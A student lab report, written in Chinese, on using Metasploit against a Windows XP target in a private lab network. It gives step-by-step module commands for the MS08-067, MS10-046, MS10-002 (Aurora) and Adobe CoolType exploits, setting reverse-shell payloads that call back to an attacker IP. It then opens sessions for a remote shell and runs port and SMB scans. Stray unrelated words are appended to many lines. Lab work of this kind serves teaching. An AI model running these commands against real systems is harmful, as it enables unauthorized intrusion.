本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:shell
輸入 「msfconsole」 及「search ms08_067」進行漏洞搜索windows
輸入「use exploit/windows/smb/ms08_067_netapi」及「show payloads」顯示可調用的攻擊載荷api
輸入「set payload generic/shell_reverse_tcp」設置攻擊載荷,tcp反彈鏈接瀏覽器
「set LHOST 192.168.198.145」及「set LPORT 4313」設置回連ip及端口session
「set RHOST 192.168.198.147"設置
靶機winxp iptcp
「set target 0」自動選擇目標系統類型,匹配度較高學習
「show options」查看設置是否正確網站
最後輸入「exploit」開啓監聽編碼
監聽失敗是由於靶機防火牆沒關url
監聽成功
基本步驟同上,不過是使用「use exploit/windows/browser/ms10_046_shortcut_icon_dllloader」模塊
發現SRVHOST沒填,輸入「set SRVHOST 192.168.198.145」
輸入「exploit」,能夠看到生成一個url
在靶機的瀏覽器中訪問該url
輸入「sessions」命令查看當前活動連接
輸入「sessions -i 1」接入ID爲1的活動連接,獲取靶機shell
ms10_002颱風漏洞是IE瀏覽器漏洞,也是黑客掛馬利用的最熱門漏洞
輸入「use windows/browser/ms10_002_aurora」調用模塊
「set payload windows/meterpreter/reverse_http」設置http反向回連
而後設置攻擊機ip和攻擊端口
「set URIPATH 4313dgx」設置統一資源標識符路徑
生成url
攻擊機回連成功
選擇「use exploit/windows/browser/adobe_cooltype_sing」模塊
「set payload windows/meterpreter/reverse_tcp」設置tcp反向鏈接
設置攻擊機ip和端口
「set FILENAME 20164313.pdf」設置攻擊文件名稱
因爲我用的是 browser 下的攻擊模塊,因此它會生成一個 url 連接,點開會自動下載一個空白的 pdf 文件。
攻擊成功
輸入「sessions」查看當前會話
「sessions -i 1」及「shell」 選擇第一個會話,獲取靶機shell
輸入「use auxiliary/scanner/portscan/tcp」 掃描目標主機上TCP使用的端口號
「set RHOST 192.168.198.147」設置靶機ip
輸入「scanner/smb/smb_version」查看靶機的smb版本
「set RHOST 192.168.198.147」設置靶機ip
輸入「use auxiliary/scanner/discovery/udp_sweep」 檢測目標主機上經常使用的udp服務
「set RHOSTS 192.168.198.147」設置靶機ip
答: exploit:滲透攻擊,利用發現的漏洞對靶機進行攻擊。
payload:攻擊載荷,滲透攻擊成功後在系統中運行的模塊,即經過滲透攻擊把攻擊載荷運至靶機中。
Ecode:編碼器,對代碼進行異或、祛除壞字符及其餘編碼,保護攻擊載荷不被發現。
答:咱們學會了初步的滲透、免殺、攻擊,但在實戰中如何讓靶機運行咱們製做的病毒文件是咱們缺乏的,由於我不會傻傻的訪問一個我不瞭解網站,而後下載一個對我沒有意義的文件,更不用說運行那個文件了。
此次實驗其實並不難,也讓我對msf功能的強大有了進一步的認識,可是發現本身對msf的瞭解還不夠,對於一些指令的理解也不透徹。另外,也認識到世界上沒有完美的程序,總會存在各類各樣的漏洞,可以被黑客利用,平時仍是須要更認真學習的。